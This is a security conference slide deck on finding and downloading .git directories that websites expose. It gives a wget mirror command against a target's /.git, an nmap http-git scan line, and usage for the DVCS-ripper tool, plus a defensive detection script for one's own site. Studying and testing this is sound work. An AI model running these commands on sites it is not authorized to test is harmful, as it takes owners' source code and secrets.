#OpenFest
    Ripping web accessible .git files
(or how to get the source when it's not open source)




           Vlatko Kosturjak, Diverto
                  https://twitter.com/k0st
Agenda
●   Introduction
●   Finding repos
●   Cloning them
●   How to get the source when it's not open source
●   How to Profit




                                    5 minutes
You found .git?
Want source?
● Get the repo:
mkdir git-test
cd git-test
wget --mirror --include-directories=/.git http://www.target.com/.git
● Get files
cd www.target.com
git reset --hard
●   Profit!

         http://www.skullsecurity.org/blog/2012/using-git-clone-to-get-pwn3d
Problem




Directory browsing disabled
No tool available to detect
●   Most of the web/network scanners will not find this
    ●   No awareness
●   Tools look only at this
    ●   .git/ => 403
●   They should actually look at
    ●   .git/logs/HEAD => 200
    ●   .git/config => 200
    ●   .git/index => 200
    ●   ...
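
A self-audit version of that check, as an added example (not from the slides or the http-git script): it classifies responses collected from your own site by file content rather than status code alone, so a styled "not found" page served with 200 does not count as a hit. The function name, verdict labels, the two-file threshold, the extra `.git/HEAD` check and the sample responses are constructed for illustration.

```python
import re

# Content signatures for files present in any git repository. A 200 alone is
# not proof: many sites answer unknown paths with a 200 "not found" page.
SIGNATURES = {
    ".git/HEAD": lambda b: re.match(rb"(ref: refs/|[0-9a-f]{40}\s*$)", b) is not None,
    ".git/config": lambda b: b"[core]" in b,
    ".git/index": lambda b: b.startswith(b"DIRC"),
    ".git/logs/HEAD": lambda b: re.match(rb"[0-9a-f]{40} [0-9a-f]{40} ", b) is not None,
}


def assess(responses):
    """responses: {path: (http_status, body_bytes)} gathered from your own site.

    Returns (verdict, confirmed_paths). The status of .git/ itself is ignored
    on purpose: a 403 on the directory says nothing about the files under it.
    """
    confirmed = sorted(
        path for path, check in SIGNATURES.items()
        if path in responses
        and responses[path][0] == 200
        and check(responses[path][1])
    )
    if len(confirmed) >= 2:      # threshold is an assumption of this example
        verdict = "exposed"
    elif confirmed:
        verdict = "suspicious"
    else:
        verdict = "not exposed"
    return verdict, confirmed


# Constructed sample responses (not captured from any real host).
LOG_LINE = (b"0" * 40 + b" " + b"a" * 40 +
            b" Dev <dev@example.com> 1350000000 +0200\tcommit (initial): init\n")
EXPOSED = {
    ".git/": (403, b"Forbidden"),
    ".git/HEAD": (200, b"ref: refs/heads/master\n"),
    ".git/config": (200, b"[core]\n\trepositoryformatversion = 0\n"),
    ".git/index": (200, b"DIRC\x00\x00\x00\x02\x00\x00\x00\x01"),
    ".git/logs/HEAD": (200, LOG_LINE),
}
SOFT_404 = {p: (200, b"<html><body>Page not found</body></html>") for p in EXPOSED}
BLOCKED = {p: (403, b"Forbidden") for p in EXPOSED}

if __name__ == "__main__":
    for name, sample in [("exposed", EXPOSED), ("soft-404", SOFT_404), ("blocked", BLOCKED)]:
        print(name, assess(sample))
```
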
Nmap NSE comes to rescue
●   Have to use latest SVN version
    ●   Script is not in 6.01
●   It looks for all relevant git files
    ●   .git/logs/HEAD
    ●   .git/config
    ●   ...
●   nmap -sS -PS80,81,443,8080,8081 -p80,81,443,8080,8081 --script=http-git <target>

    PORT      STATE SERVICE
    80/tcp    open   http
    | http-git:
    |    Potential Git repository found at XX.XX.XX.XX:XX/.git/ (found 5 of 6 expected files)
DVCS-Pillage
●   It will rip the .git files when directory browsing is disabled
    ●   By Adam Baldwin
●   Accessible from URL:
    ●   https://github.com/evilpacket/DVCS-Pillage
●   Has a few problems
    ●   Hmm...
Problems...
●   Current methods
    ●   Not complete tree download method
        –   Packed refs
        –   git ls-files --stage method
    ●   No support for branches
    ●   No support for protocols other than http
●   Time to code my own tool
    ●   Want whole tree
    ●   Branches
    ●   Support old protocols
DVCS-rip
●   It will rip the .git files when directory browsing is disabled
●   It will rip ALL files and check out the repository for you
    ●   Not partial
    ●   git fsck trick
●   Support for
    ●   Branches
    ●   Any protocol (http/https/...)
●   Accessible from URL:
    ●   https://github.com/kost/dvcs-ripper
DVCS-rip
●   How to run?
●   Example run:
    ●   rip-git.pl -v -u http://www.example.com/.git/
●   It will automatically do "git checkout -f"
●   Profit!
Evolving




Good example of open source collaboration between projects
Questions? Comments? Feedback?

                    @k0st
                            This is zero



Acknowledgements:
Adam Baldwin,
Ron Bowes,
Alex Weber,
...
